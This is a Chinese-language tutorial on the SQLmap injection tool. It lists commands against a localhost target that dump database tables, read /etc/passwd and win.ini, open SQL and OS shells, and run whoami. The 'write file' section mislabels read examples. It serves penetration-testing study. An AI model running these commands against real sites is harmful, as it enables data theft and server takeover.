SQL注入——SQLmap使用

什麼是sqlmap

• SQLmap SQLmap是一個自動化的SQL注入工具，其主要功能是掃描，發現並利用給定的URL的SQL注入漏洞，其廣泛的功能和選項包括數據庫指紋，枚舉，數據庫提權，訪問目標文件系統，並在獲取完全操作權限時實行任意命令

SQLmap-工作原理

• 當給sqlmap這麼一個url的時候，它會：
• 檢測網站是否能夠訪問。
• 檢測是否有waf。
• 判斷可注入的參數。
• 判斷可以用那種SQL注入技術來注入。
• 識別出哪種數據庫。
• 根據用戶輸入的參數，進行操作。

SQLmap-特性

• 1、基於布爾的盲注，即可以根據返回頁面判斷條件真假的注入。

• 2、基於時間的盲注，即不能根據頁面返回內容判斷任何信息，用條件語句查看時間延遲語句是否執行（即頁面返回時間是否增加）來判斷。

• 3、基於報錯注入，即頁面會返回錯誤信息，或者把注入的語句的結果直接返回在頁面中。

• 4、聯合查詢注入，可以使用union的情況下的注入。

• 5、堆查詢注入，可以同時執行多條語句的執行時的注入。

• 6、內聯查詢注入，在sql語句中執行sql語句

SQLmap-支持的數據庫類型

MySQL	Oracle	PostgreSQL	Microsoft SQL Server
Microsoft Access	IBM DB2	SQLite	Firebird
Sybase	SAP MaxDB	informix	HsqlDB

SQLmap-顯示等級

•  0、只顯示python錯誤以及嚴重的信息。

• 1、同時顯示基本信息和警告信息。（默認）

• 2、同時顯示debug信息。

• 3、同時顯示注入的payload。

• 4、同時顯示HTTP請求。

• 5、同時顯示HTTP響應頭。

• 6、同時顯示HTTP響應頁面。

• -v參數

SQLmap常規步驟

判斷是否有注入	sqlmap –u “http://127.0.0.1/test.php?id=1”
查看所有數據庫	sqlmap –u “http://127.0.0.1/test.php?id=1” --dbs
查看當前使用的數據庫	sqlmap –u “http://127.0.0.1/test.php?id=1” --current-db
查看數據表	sqlmap –u “http://127.0.0.1/test.php?id=1” -D sqlinject --tables
查看列名	sqlmap –u “http://127.0.0.1/test.php?id=1” -D sqlinject -T admin --columns
查看數據	sqlmap –u “http://127.0.0.1/test.php?id=1” -D sqlinject -T admin --dump

sqlmap讀文件

滿足以下條件：

• 1、secure-file-priv (show variables)

• 2、目錄權限

• 3、max_allowed_packed

• 4、知道絕對路徑

sqlmap寫文件

• load_file(‘c://windows//win.ini’)

• load_file(0x633A2F2F77696E646F77732F2F77696E2E696E69)

• Sqlmap –u “http://127.0.0.1/1.php?id=1” --file-read “/etc/passwd”

• 寫文件權限
•     secure-file-priv (show variables)
•     目錄權限
•     知道絕對路徑
•     繞過單引號

Sqlmap執行sql語句

• Sqlmap –u “http://127.0.0.1/1.php?id=1” --sql-query=”select version()”

• Sqlmap –u “http://127.0.0.1/1.php?id=1” --sql-shell

• Sqlmap –u “http://127.0.0.1/1.php?id=1” --sql-file=“c:\1.sql”

Sqlmap執行系統命令

• sqlmap –u “http://127.0.0.1/1.php?id=1” --os-cmd=whoami

• sqlmap –u “http://127.0.0.1/1.php?id=1” --os-shell